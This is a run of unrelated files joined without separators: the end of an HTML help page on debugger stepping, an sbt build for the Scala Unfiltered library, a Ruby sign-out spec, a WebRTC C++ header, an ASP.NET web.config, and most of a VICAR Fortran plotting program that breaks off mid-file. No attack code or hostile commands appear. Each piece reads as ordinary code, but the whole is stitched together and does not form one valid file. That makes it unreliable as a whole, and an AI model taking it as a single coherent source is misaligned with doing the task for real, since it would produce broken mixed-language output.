<p>The editor shows the current values of variables when you hover the mouse cursor over a variable name. This is depicted
on the image above, where the <code>${scalar}</code> variable is shown to have the current value of <code>100</code>.
</p>
<h4 id="assist_editor">Assistance editor</h4>
<p>Library keyword frames do not display the code; instead a special kind of <b>debugger assistance</b> editor
is used. For example, if you <b>Step Into</b> a library keyword you will see the following editor opened:
</p>
<img src="images/debug_assist_editor.png"/>
<p>One may change the <a href="preferences.html">Debugger preferences</a> in order to never suspend inside
library keywords this way.
</p>
<p>Additionally, the assistance editor may also describe erroneous debugger states if there is no source in which the
instruction pointer can be shown. You may find yourself in this situation even in local launches when your test
calls some unknown keyword:
</p>
<img src="images/debug_assist_editor_error.png"/>
<h3>Continuing</h3>
<p>Whenever you're ready to resume test execution, simply hit the <b>Resume</b> button (or <kbd>F8</kbd>) and the
debugger will suspend on the next breakpoint, in the next erroneous state (if not disabled in preferences) or whenever
you explicitly pause the execution. Apart from that you may perform a step. There are 3 kinds of steps:
</p>
<ul>
<li><b>Step Into</b> <kbd>F5</kbd> - this kind of step is only possible for the top stack frame. When performing
    a <b>step into</b>, the execution resumes only for a single step, which enters the keyword called in the current
    line.
<p></p></li>
<li><b>Step Over</b> <kbd>F6</kbd> - this kind of step is possible for every frame on the stack and behaves
    differently for each of them. In general this kind of step means 'suspend the execution on the next keyword
    at the same level as the instruction pointed to by the selected stack frame'.
<p></p></li>
<li><b>Step Return</b> <kbd>F7</kbd> - similarly to <b>Step Over</b>, this action is possible for every frame
    on the stack and behaves differently for each of them. This kind of step means 'suspend the execution on the next
    keyword which will be executed after the selected frame has ended'. For a frame related to a user keyword this means
    that the debugger will pause on the next instruction after this user keyword ends. For a test-related frame the
    debugger will suspend at the very first instruction in the next test (if any). For a suite-related frame the debugger
    will suspend at the very first keyword in the next suite (if any).
<p></p></li>
</ul>
<p>Of course the debugger will suspend if it encounters e.g. a breakpoint inside code which should be stepped over.
</p>
</body>
</html>
import Common._
import Unfiltered._
import Dependencies._
import ReleaseTransformations._
Common.settings
enablePlugins(ScalaUnidocPlugin)
// unidoc publish settings
name := "unfiltered-all"
artifacts := Classpaths.artifactDefs(Seq(packageDoc in Compile)).value
packagedArtifacts := Classpaths.packaged(Seq(packageDoc in Compile)).value
Defaults.packageTaskSettings(
packageDoc in Compile, (unidoc in Compile).map{_.flatMap(Path.allSubpaths)}
)
releaseCrossBuild := true
releaseProcess := Seq[ReleaseStep](
checkSnapshotDependencies,
inquireVersions,
runClean,
runTest,
setReleaseVersion,
commitReleaseVersion,
tagRelease,
releaseStepCommandAndRemaining("+publishSigned"),
releaseStepCommandAndRemaining("sonatypeBundleRelease"),
setNextVersion,
commitNextVersion,
pushChanges,
)
val specs2ProjectId = "specs2"
val scalatestProjectId = "scalatest"
val filterProjectId = "filter"
// avoid cyclic error
def dependsOnInTest(id: String) =
unmanagedClasspath in Test ++= (fullClasspath in (local(id), Compile)).value
val dependsOnSpecs2InTest = dependsOnInTest(specs2ProjectId)
lazy val library: Project = module("unfiltered")(
dirName = "library",
projectId = "unfiltered"
).settings(
description := "Core library for describing requests and responses",
dependsOnSpecs2InTest,
dependsOnInTest(scalatestProjectId),
dependsOnInTest(filterProjectId),
libraryDependencies ++= Seq(
"commons-codec" % "commons-codec" % commonsCodecVersion,
specs2Dep.value % "test",
"org.scalatest" %% "scalatest" % scalatestVersion % "test",
"org.scalatestplus" %% "scalacheck-1-14" % scalatestScalacheckVersion % "test",
),
libraryDependencies ++= {
CrossVersion.partialVersion(scalaVersion.value) match {
case Some((2, v)) if v >= 11 =>
Seq("org.scala-lang.modules" %% "scala-xml" % scalaXmlVersion)
case _ =>
Nil
}
}
).dependsOn(util)
lazy val directives = module("directives")().settings(
description := "monadic api for unfiltered"
).dependsOn(library, specs2 % "test")
lazy val filters = module(filterProjectId)().settings(
description := "Server binding for Java Servlet filters",
libraryDependencies += servletApiDep,
dependsOnSpecs2InTest
).dependsOn(library)
lazy val filtersAsync = module("filter-async")().settings(
description := "Server binding for Java Servlet 3.0 async filters",
libraryDependencies += servletApiDep
).dependsOn(filters, specs2 % "test")
lazy val agents = module("agents")(
srcPath = "unfiltered/request"
).settings(
description := "User-Agent request matchers",
libraryDependencies += "org.scalatest" %% "scalatest" % scalatestVersion % "test",
libraryDependencies ++= Seq(servletApiDep) ++ integrationTestDeps.value
).dependsOn(
library,
scalatest % "test",
filters % "test"
)
lazy val uploads = module("uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Generic support for multi-part uploads",
libraryDependencies ++= Seq(
"commons-io" % "commons-io" % commonsIoVersion
) ++ integrationTestDeps.value
).dependsOn(library, specs2 % "test")
lazy val filterUploads = module("filter-uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Support for multi-part uploads for servlet filters",
libraryDependencies ++= Seq(
servletApiDep,
"commons-fileupload" % "commons-fileupload" % commonsFileUploadVersion
) ++ integrationTestDeps.value
).dependsOn(uploads, filters, specs2 % "test")
lazy val util = module("util")().settings(
libraryDependencies += specs2Dep.value % "test"
)
lazy val jetty = module("jetty")().settings(
description := "Jetty server embedding module",
libraryDependencies := Seq(
"org.eclipse.jetty" % "jetty-webapp" % jettyVersion
)
).dependsOn(util)
lazy val nettyServer = module("netty-server")(
srcPath = "unfiltered/netty"
).settings(
description := "Netty server embedding module",
dependsOnSpecs2InTest,
libraryDependencies += "javax.activation" % "activation" % javaxActivationVersion,
libraryDependencies ++= integrationTestDeps.value
).dependsOn(netty, util)
lazy val netty = module("netty")().settings(
description := "Netty server binding module",
dependsOnSpecs2InTest,
libraryDependencies ++= {
("io.netty" % "netty-codec-http" % nettyVersion) +:
("io.netty" % "netty-handler" % nettyVersion) +:
("io.netty" % "netty-transport-native-epoll" % nettyVersion classifier "linux-x86_64") +:
("io.netty" % "netty-transport-native-kqueue" % nettyVersion classifier "osx-x86_64") +:
integrationTestDeps.value
}
).dependsOn(library)
lazy val specs2: Project = module(specs2ProjectId)().settings(
description := "Facilitates testing Unfiltered servers with Specs2",
libraryDependencies ++= {
specs2Dep.value :: okHttp
}
).dependsOn(filters, jetty, nettyServer)
lazy val scalatest = module(scalatestProjectId)().settings(
description := "Facilitates testing Unfiltered servers with ScalaTest",
libraryDependencies ++= {
okHttp :+
("org.scalatest" %% "scalatest-core" % scalatestVersion)
}
).dependsOn(filters, jetty, nettyServer)
lazy val json4s = module("json4s")(
srcPath = "unfiltered"
).settings(
description := "Json4s request matchers and response functions",
libraryDependencies ++= {
Seq("org.json4s" %% "json4s-native" % json4sVersion) ++ integrationTestDeps.value
}
).dependsOn(library, filters % "test", specs2 % "test")
lazy val websockets = module("netty-websockets")().settings(
description := "WebSockets plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
libraryDependencies += "com.ning" % "async-http-client" % asyncHttpClientVersion % "test"
).dependsOn(nettyServer, specs2 % "test")
lazy val nettyUploads = module("netty-uploads")().settings(
description := "Uploads plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
parallelExecution in Test := false
).dependsOn(nettyServer, uploads, specs2 % "test")
require 'spec_helper'
describe "SignoutStories" do
let(:member) {
FactoryBot.create(:member, password: 'mala', password_confirmation: 'mala')
}
context "when sign in as a member" do
before { login_as(member) }
it {
click_on 'Sign Out'
expect(current_path).to be == '/login'
}
end
end
/*
* Copyright 2018 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#ifndef MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#define MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#include <memory>
#include "modules/congestion_controller/bbr/bbr_factory.h"
#include "modules/congestion_controller/bbr/bbr_network_controller.h"
#include "modules/congestion_controller/test/controller_printer.h"
namespace webrtc {
class BbrStatePrinter : public DebugStatePrinter {
public:
BbrStatePrinter();
~BbrStatePrinter() override;
void Attach(bbr::BbrNetworkController*);
bool Attached() const override;
void PrintHeaders(FILE* out) override;
void PrintValues(FILE* out) override;
NetworkControlUpdate GetState(Timestamp at_time) const override;
private:
bbr::BbrNetworkController* controller_ = nullptr;
};
class BbrDebugFactory : public BbrNetworkControllerFactory {
public:
explicit BbrDebugFactory(BbrStatePrinter* printer);
std::unique_ptr<NetworkControllerInterface> Create(
NetworkControllerConfig config) override;
bbr::BbrNetworkController* BbrController();
private:
BbrStatePrinter* printer_;
bbr::BbrNetworkController* controller_ = nullptr;
};
} // namespace webrtc
#endif // MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="webPages:Enabled" value="false" />
<add key="ViewCache:Enabled" value="false" />
<add key="ViewPath:Value" value="Views" />
<add key="ViewRecursiveDiscovery:Enabled" value="true" />
</appSettings>
</configuration>
INCLUDE 'VICMAIN_FOR'
SUBROUTINE MAIN44
C PROGRAM QPLOT2
C 10 JUL 95 ...CRS (CRI) MST S/W CONVERSION (VICAR PORTING)
C 22 AUG 85 ...JHR... CONVERTED TO VICAR2, RENAMED QPLOT2
C 22 APR 82 ...JHR... INITIAL RELEASE
C E,QPLOT2,IN,*,,PARAMS
C THIS PROGRAM PLOTS LINES OF DN VS RELATIVE SAMPLE NUMBER.
C A MAXIMUM OF 10 LINES MAY BE PLOTTED ON THE GRAPH
C A MAXIMUM OF 10 DATA SETS MAY BE USED
C ANY LINE DIRECTION MAY BE SPECIFIED
C IF THE LINE DIRECTION IS NOT HORIZONTAL OR VERTICAL
C THE OUTPUT SAMPLE POINTS ARE SPACED THE SAME AS THE X AND Y
C AXES, I.E. IF THE LINE DIRECTION IS 45 DEGREES THE NUMBER OF
C OUTPUT SAMPLES WILL BE THE SQUARE ROOT OF 2 TIMES THE NUMBER
C OF INPUT SAMPLES
C
C * PROCESS IN,SL,SS,EL,ES SPECIFIES THE INPUT NUMBER,
C STARTING LINE, STARTING SAMPLE, ENDING LINE, AND
C ENDING SAMPLE.
C
C
implicit none
EXTERNAL EQUIV
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SL,SS,EL,ES,IN,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
INTEGER*4 IN(10),SL(10),SS(10),EL(10),ES(10),UNIT(10)
INTEGER*4 GTYPE,TTLTOP,NLI(10),NSI(10),NBI(10)
integer*4 STAT,IPARM(256),TICS
integer*4 i,ii,j,jj,n,icount,idef,iline,ind,isize,psize
integer*4 labtop,lcheck,lx,ly,lb,ni,nlines,np,nschan,ntest
integer*4 ntics,ntitle,ntitx,ntity,nx,ny,nchan,naline
integer*4 plotwid,plotht,ntbl,nplotgpi,nplotout
integer*4 nplotgpi2,nploteps,ntmptbl,charsize,charsteps
integer*4 pttype(20),lntype(20),ptcolorl(20)
REAL*4 RPARM(256),XAXIS(4),YAXIS(4)
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX,XLNGTH,YLNGTH
real*4 displace,rds,size,xpage,xscldt,yscldt
logical*4 XVPTST, NORM, xsclset, ysclset, epsplot, nolabel
character*1 LPARM(1024)
character*4 FORMAT(10),aline
character*8 plotfmt
character*24 tbl,tmptbl
character*30 alinenum
CHARACTER*63 XTTL,YTTL,TTL,CBUF,XTITLE,YTITLE,TITLE
character*63 msg,plotgpi,plotgpi2,ploteps
character*56 headermsg(220) !! Labels * (lines per label+2)
CHARACTER*63 plotout
character*120 filename(10)
c
character*8 ptcolor(20),lncolor(20)
character*4 gpi/'.gpi'/,eps/'.eps'/,asc/'.asc'/
c
character*1 num(5)
character bash
c
data num/'1','2','3','4','5'/
data tmptbl/'tmptbl.'/
data aline/'line'/
C
data pttype/ 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13/
data lntype/ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1/
data ptcolor/'green','purple','magenta','blue','brown',
1 'red','cyan','orange','green','purple',
2 'magenta','blue','brown','red','cyan',
3 'orange','green','purple','magenta','blue'/
data ptcolorl/5,6,7,4,5, 3,4,6,5,6, 7,4,5,3,4, 6,5,6,7,4/
data lncolor/'beige','red','green','cyan','purple',
1 'blue','orange','magenta','beige','red',
2 'green','cyan','purple','blue','orange',
3 'magenta','beige','red','green','cyan'/
c
call xvmessage('qplot2 version 2015-08-19',' ')
bash=achar(92)
C
C SET DEFAULTS AND INITIALIZE
c tbl='tmptbl.x'
c ntbl=index(tbl,' ') - 1
YTITLE = 'DN VALUE'
XTITLE = 'RELATIVE SAMPLE NUMBER'
TITLE = 'IPL LINE PLOT'
C 'PLOTNAME'
epsplot=.false.
nplotgpi = 0
nplotgpi2 = 0
nplotout = 0
nploteps = 0
ntbl = 0
epsplot = .false.
CALL XVPARM ('PLOTFMT',plotfmt,icount,idef,1)
if (plotfmt .eq. 'EPS' .or. plotfmt .eq. 'eps') epsplot = .true.
PLOTOUT= 'qplot.eps'
nplotout=index(plotout,' ') - 1
plotgpi= 'qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
plotgpi2= 'qplot.eps.gpi'
nplotgpi2=index(plotgpi2,' ') - 1
tbl='qplot.asc'
ntbl = index(tbl,' ') - 1
CALL XVPARM('PLOTOUT',cbuf,ICOUNT,IDEF,1)
IF (IDEF .EQ. 0) THEN
if (cbuf .eq. "YES" .or. cbuf .eq."yes") then
c epsplot = .true.
plotout='qplot'
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c Plotout and nplotout from above
elseif (cbuf .eq. "NONE" .or. cbuf .eq."none") then
c epsplot = .false.
plotgpi='qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
else
plotout = CBUF
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c epsplot = .true.
endif
ELSE
c epsplot = .false.
plotgpi='qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
END IF
GTYPE=0 !graph type: 1=PROCESS 2=SPROCESS
NCHAN=1 !number of channels (bands in MSS data)
! 5 bands
SIZE=.10
isize = 10 !gnuplot file
psize = 16 !eps file
displace=0.
RDS=0.
NTITX=22
NTITY=8
NTITLE=13
NORM=.FALSE.
nolabel=.false. !Put vicar labels on graph
TICS=1 !set default to tics
LABTOP=1
TTLTOP=1
XLNGTH=9.0
YLNGTH=7.0
XSCLMN=1.
XSCLMX=1.
YSCLMN=0.
YSCLMX=0.
xsclset = .false.
ysclset = .false.
TTL='IPL LINE PLOT'
XTTL='RELATIVE SAMPLE NUMBER'
YTTL='DN VALUE'
DO 5 J=1,10
XMIN(J)=0.
XMAX(J)=0.
YMIN(J)=0.
YMAX(J)=255.
5 CONTINUE
XPAGE=0.5
iiline = 1
i2line = 0
C
C OPEN INPUT DATA SETS
C
CALL XVP('INP',LPARM,NI) !max = 10
DO 10 I=1,NI
CALL XVUNIT(UNIT(I),'INP',I,STAT,' ')
CALL XVOPEN(UNIT(I),STAT,'U_FORMAT','REAL',' ')
CALL XVGET(UNIT(I),STAT,'NL',NLI(I),'NS',NSI(I),
& 'FORMAT',FORMAT(I),'NB',NBI(I),' ')
c IF (FORMAT(I) .EQ. 'HALF') HALF(I)=1
c print *, 'Number of bands = ',nbi(i)
if (nbi(i) .gt. 1) then
call xvmessage("??E - Multiband images not supported"," ")
call xvmessage(" Convert to MSS format with TRAN"," ")
call abend
endif
10 CONTINUE
c
CALL XVP('INP',FILENAME,ICOUNT) !INPUT FILENAMES
C
C *** PROCESS PARAMETERS ***
C
C 'NCHAN'
CALL XVPARM('NCHAN',NCHAN,ICOUNT,IDEF,1)
NSCHAN=NSI(1)/NCHAN
c print *,"nchan = ",nchan
C 'PROCESS' - profile plot for
CALL XVPARM('PROCESS',IPARM,ICOUNT,IDEF,50)
c 5 numbers, DataSetNum SL,SS,EL,ES
IF (ICOUNT .NE. 0) THEN
GTYPE=1
NLINES=ICOUNT/5
IF (5*NLINES .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - Invalid count for parameter "PROCESS"',' ')
CALL ABEND
END IF
DO I=1,NLINES
IN(I)=IPARM(5*(I-1)+1)
SL(I)=IPARM(5*(I-1)+2)
SS(I)=IPARM(5*(I-1)+3)
EL(I)=IPARM(5*(I-1)+4)
ES(I)=IPARM(5*(I-1)+5)
IF (IN(I) .LT. 1 .OR. IN(I) .GT. NI) THEN
call xvmessage ('??E - Invalid input number specified',' ')
call abend
ENDIF
IF (SL(I) .LT. 1) CALL MABEND('??E - invalid starting line')
IF (SS(I) .LT. 1) CALL MABEND('??E - Invalid starting sample')
IF (EL(I) .GT. NLI(IN(I))) CALL MABEND('??E - invalid ending line')
IF (ES(I) .GT. NSI(IN(I)))CALL MABEND('??E - invalid ending sample')
IF (SL(I) .EQ. EL(I) .AND. SS(I) .EQ. ES(I)) then
call mabend('??E - null line segment specified')
endif
if (format(IN(I)) .EQ. 'HALF') YMAX(I)=32767
if (format(IN(i)) .EQ. 'FULL') YMAX(i)=65536
if (format(IN(i)) .EQ. 'REAL') YMAX(i)=65536.
END DO
END IF
C 'SPROCESS' - Spectral Plots
CALL XVPARM('SPROCESS',IPARM,ICOUNT,IDEF,20)
c print *,"sprocess icount = ",icount," idef = ",idef
IF (ICOUNT .NE. 0) THEN
IF (GTYPE .NE. 0) THEN
CALL XVMESSAGE
& ('??E - Cannot specify both PROCESS and SPROCESS',' ')
CALL ABEND
END IF
IF (NI .NE. 1) THEN
CALL XVMESSAGE
& ('??E - Spectral plots require 1 input in MSS format',' ')
CALL ABEND
END IF
IF (NCHAN .EQ. 1) THEN
CALL XVMESSAGE('??E - Must specify nchan for spectral plots',' ')
CALL ABEND
END IF
GTYPE=2
NLINES=ICOUNT/2
IF (2*NLINES .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - invalid count for parameter "SPROCESS"',' ')
CALL ABEND
END IF
DO I=1,NLINES
IN(I)=1
SL(I)=IPARM(2*(I-1)+1)
SS(I)=IPARM(2*(I-1)+2)
c print *, "sl,ss = ",sl(i),ss(i)
END DO
TITLE = 'IPL SPECTRAL PLOT'
c NTITLE=17 - change to automatically compute string length if TITLE were to change
ntitle = index(title,' ') - 1
XTITLE = 'CHANNEL NUMBER'
c NTITX=14
ntitx = index(xtitle,' ') - 1
c IF (FORMAT(1) .EQ. 'HALF') YMAX(1)=32767
END IF !IF (ICOUNT .NE. 0)
C 'LABELSIZ'
CALL XVPARM('LABELSIZ',ISIZE,ICOUNT,IDEF,1) !font in points
c print *, 'size = ',isize
C 'LOLABEL'
IF (XVPTST('LOLABEL')) LABTOP=0
c 'Nolabel'
if (XVPTST('NOLABEL')) nolabel=.true.
C 'TICS'
IF (XVPTST('NOTICS')) TICS=0
C 'DISPLACEMENT'
CALL XVPARM('DISPLACE',displace,ICOUNT,IDEF,1)
plotwid = 648 !640 @72dpi = 8.888.. inches 9 inch = 648
plotht = 504 !480 @72dpi = 6.666.. inches 7 inch = 504
C 'XLENGTH'
CALL XVPARM('XLENGTH',XLNGTH,ICOUNT,IDEF,1)
c if idef = 1 then default used
if (idef.eq.0) then
plotwid = 72 * xlngth
endif
C 'YLENGTH'
CALL XVPARM('YLENGTH',YLNGTH,ICOUNT,IDEF,1)
if (idef.eq.0) then
plotht = 72 * ylngth
endif
C 'XSCALE'
CALL XVPARM('XSCALE',RPARM,ICOUNT,IDEF,2)
IF(ICOUNT .EQ. 2) THEN
XSCLMN=RPARM(1)
XSCLMX=RPARM(2)
xsclset = .true.
ENDIF
C 'YSCALE'
CALL XVPARM('YSCALE',RPARM,ICOUNT,IDEF,2)
IF(ICOUNT .EQ. 2) THEN
YSCLMN=RPARM(1)
YSCLMX=RPARM(2)
ysclset = .true.
ENDIF
C 'XVALUES'
CALL XVPARM('XVALUES',RPARM,ICOUNT,IDEF,20)
IF(ICOUNT .GE. 2) THEN
N=ICOUNT/2
IF (2*N.NE.ICOUNT) THEN
CALL XVMESSAGE('??E - invalid count for parameter "XVALUES"',' ')
CALL ABEND
END IF
DO I=1,N
XMIN(I)=RPARM(2*(I-1)+1)
XMAX(I)=RPARM(2*(I-1)+2)
END DO
ENDIF
C 'YVALUES'
CALL XVPARM('YVALUES',RPARM,ICOUNT,IDEF,20)
IF(ICOUNT .GE. 2) THEN
N=ICOUNT/2
IF (2*N .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - Invalid count for parameter "YVALUES"',' ')
CALL ABEND
END IF
DO I=1,N
YMIN(I)=RPARM(2*(I-1)+1)
YMAX(I)=RPARM(2*(I-1)+2)
END DO
ENDIF
C 'LOTITLE'
IF (XVPTST('LOTITLE')) TTLTOP=0
C 'NORM'
NORM = XVPTST('NORM')
IF (NORM) YLNGTH=5.
IF (NORM) YSCLMX=1.
C 'RDS'
CALL XVPARM('RDS',RDS,ICOUNT,IDEF,1)
C 'XTITLE'
CALL XVPARM('XTITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. XTTL) THEN
XTITLE = ' '
WRITE(XTITLE(1:),'(A)') CBUF
NTITX=INDEX(CBUF,' ') - 1
IF (NTITX .LE. 0) NTITX=52
END IF
C 'YTITLE'
CALL XVPARM('YTITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. YTTL) THEN
YTITLE = ' '
WRITE(YTITLE(1:),'(A)') CBUF
NTITY=INDEX(CBUF,' ') - 1
IF (NTITY .LE. 0) NTITY=52
END IF
C 'TITLE'
CALL XVPARM('TITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. TTL) THEN
TITLE = ' '
WRITE(TITLE(1:),'(A)') CBUF
NTITLE=INDEX(CBUF,' ') - 1
IF (NTITLE .LE. 0) NTITLE=52
END IF
C
C FIND LENGTH OF LONGEST LINE
NP=0
IF (GTYPE .EQ. 1) THEN !PROCESS
c NP=0
DO J=1,NLINES
NX=IABS(SL(J)-EL(J))
NY=IABS(SS(J)-ES(J))
NTEST=SQRT(FLOAT(NX*NX+NY*NY))+1
IF (NTEST .GT. NP) NP=NTEST
ENDDO
ENDIF
c print *, "np = ",np
IF (GTYPE .EQ. 2) NP=NCHAN !SPROCESS
C
C LX IS NUMBER OF BYTES NEEDED FOR X ARRAY.
C (ONE FULLWORD FOR EACH PT. PLUS TWO MORE FOR XSCLMN AND XSCLDT)
c used for stacka
LX=4*(NP+2)
LY=LX
LCHECK=LX !check of bytes
C
C DRAW X AXIS
GOTO 230
XSCLDT=(XSCLMX-XSCLMN)/XLNGTH
IF (XSCLDT .NE. 0.) GO TO 230
XAXIS(1)=XMIN(1)
XAXIS(2)=XMAX(1)
DO J=1,NLINES
XAXIS(1)=AMIN1(XAXIS(1),XMIN(J))
XAXIS(2)=AMAX1(XAXIS(2),XMAX(J))
END DO
IF (XAXIS(1) .GE. XAXIS(2)) XAXIS(2)=NP
ccc--- CALL SCALE(XAXIS,XLNGTH,2,1)
XAXIS(4) = XSCLDT
XAXIS(3) = XSCLMN
c -- the following is not really needed with gnuplot
230 continue
	IF (TICS .EQ. 1) THEN
C SMALL TICS: 10 PER UNIT; OTHERWISE 2 PER UNIT
	   NTICS=10*XLNGTH
	ELSE
	   NTICS=2*XLNGTH
	END IF
C
C DRAW Y AXIS
GOTO 330
YSCLDT=(YSCLMX-YSCLMN)/YLNGTH
IF (YSCLDT .NE. 0) GO TO 330
YAXIS(1)=YMIN(1)
YAXIS(2)=YMAX(1)
DO J=1,NLINES
YAXIS(1)=AMIN1(YAXIS(1),YMIN(J))
YAXIS(2)=AMAX1(YAXIS(2),YMAX(J))
END DO
ccc--- CALL SCALE(YAXIS,YLNGTH,2,1)
YAXIS(3) = YSCLMN
YAXIS(4) = YSCLDT
YSCLMX=YSCLMN+YLNGTH*YSCLDT
c -- the following is not really needed with gnuplot
330 Continue
	IF (TICS .EQ. 1) THEN
C SMALL TICS: 10 PER UNIT; OTHERWISE 2 PER UNIT
	   NTICS=10*YLNGTH
	ELSE
	   NTICS=2*YLNGTH
	END IF
C
C DRAW TITLE (DEFAULT = 'IPL LINE PLOT')
headermsg(iiline) = title
iiline = iiline + 1 !+ 3
c -- the following is not really needed with gnuplot
c here is where "line" is called
c labels (1) = ' '
c do II = 1, 10
c write (msg (1:),'(a)') 'Line '
c write (msg (6:),'(i2)') II
c write (msg (9:50),'(a)') filename(ii)(1:40)
c labels (II+1) = msg
c print *,'label (ii+1) = ', labels (II+1)
c end do
c print *,'before DO 850 ILINE=1,NLINES tbl = ',tbl(1:ntbl)
C
DO 850 ILINE=1,NLINES
C SET LB=1 IF DATA SET IS SAME AS PREVIOUS ONE
LB=0
IF (ILINE .GT. 1) THEN
IF (IN(ILINE) .EQ. IN(ILINE-1)) LB=1
END IF
if (iline .eq. 6) then
i2line = iiline
headermsg(iiline) = title
iiline = iiline + 3
endif
C
C ENSURE X ARRAY IS LARGE ENOUGH TO USE AS INPUT BUFFER ALSO
IF (LX .LT. 4*NSI(IN(ILINE))) LX=4*NSI(IN(ILINE))
C
C CALL SUBROUTINE GRAPH VIA STACKA AND EQUIV
c
c print *, 'before CALL STACKA(9,EQUIV,.... tmptbl = ',tmptbl(1:ntbl)
CALL STACKA(9,EQUIV,2,LX,LY,LCHECK,iline,IND,tmptbl,ntbl)
IF (IND .EQ. 1) GO TO 999
c print *, 'after CALL STACKA(9,EQUIV,.... tmptbl = ',tmptbl(1:ntbl)
850 CONTINUE
c print *, "y-",ysclmn, ysclmx
c print *, "x-",xsclmn, xsclmx
c This calculation is used for positioning the labels on the chart
c original method was percentage of height in fpos
cc labstep = 0.04
iiline = iiline - 2
cc go to 10000
c c if (iiline .gt. 16) then
cc tmp = iiline/16
cc plotht = int(plotht * 0.75*tmp)
cc labstep =(labstep/tmp)
cc endif
c compute y-scale height
cc tmp = ysclmx - ysclmn
cc ysclmx = ysclmx + 50*labstep*ysclmx
cc if ((ysclmx-ysclmn) .gt. 2*tmp) ysclmx = 2*tmp
cc10000 continue
charsize = 9
charsteps = (plotht)/(charsize*2) + 4 !divide by 2 for line spacing
if (charsteps .gt. 54) charsteps = charsteps - 1 !adjust for floating point
c print *, 'charsteps = ',charsteps
if (iiline .gt. (charsteps - 5).and. .not.nolabel) then
write (msg,10010)
10010 format ('Plot needs to be taller for all labels to print' )
call xvmessage(msg,' ')
endif
cc
cc open gpi data set
cc
open(98,file=plotgpi(1:nplotgpi),status='UNKNOWN',iostat=jj,err=995)
10100 format('# Created by program qplot2') !#'s are ignored in gnuplot
write(98,fmt=10100,iostat=jj,err=995)
10105 format('# Gnuplot commands for line plot(s)')
write(98,fmt=10105,iostat=jj,err=995)
10110 format('# Data in ',a)
write(98,fmt=10110,iostat=jj,err=995) tbl(1:ntbl)
10115 format('set term x11 font "ariel,',i2,'" size ',i4,', ',i4)
C size = XX,YY
write(98,fmt=10115,iostat=jj,err=995) isize,plotwid,plotht
10116 format('set output') !set output to screen
write(98,fmt=10116,iostat=jj,err=995)
if (tics .eq. 1) then
10120 format('set grid ')
write(98,fmt=10120,iostat=jj,err=995)
else
10121 format ("set noxtics")
write(98,fmt=10121,iostat=jj,err=995)
10122 format ("set noytics")
write(98,fmt=10122,iostat=jj,err=995)
endif
10125 format("set ylab '",a,"'" )
write(98,fmt=10125,iostat=jj,err=995) ytitle(1:ntity)
10130 format("set xlab '",a,"'")
write(98,fmt=10130,iostat=jj,err=995) xtitle(1:ntitx)
10141 format("set clip points") !how to deal with points out of range
write(98,fmt=10142,iostat=jj,err=995)
10142 format("set clip one") !how to deal with connecting lines out of range
write(98,fmt=10141,iostat=jj,err=995)
10145 format('set title "',a,'" font "Ariel,',i2,'"')
write(98,fmt=10145,iostat=jj,err=995) title(1:ntitle),isize
10135 format("set yrange [",f8.0,":",f8.0,"]")
write(98,fmt=10135,iostat=jj,err=995) ysclmn,ysclmx
10140 format("set xrange [",f8.0,":",f7.0,"]")
write(98,fmt=10140,iostat=jj,err=995) xsclmn,xsclmx
cc go to 11000
c output labels for only top 60% of plot
cc fpos=1.0 ! + labstep
cc do ii=2,iiline
cc i = ii - 1
cc fpos = fpos - labstep
cc10160 format('set label ',i2,' "',a,'" at graph .30 ,',f5.2,
cc 1 ' font "ariel,9" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
cc write(98,fmt=10160,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), fpos
cc print 10160, i,headr(ii)(1:nheadr(ii)), fpos
cc10155 format("set label 2 '",a,"' at graph 0.4, 0.90 front nopoint tc def")
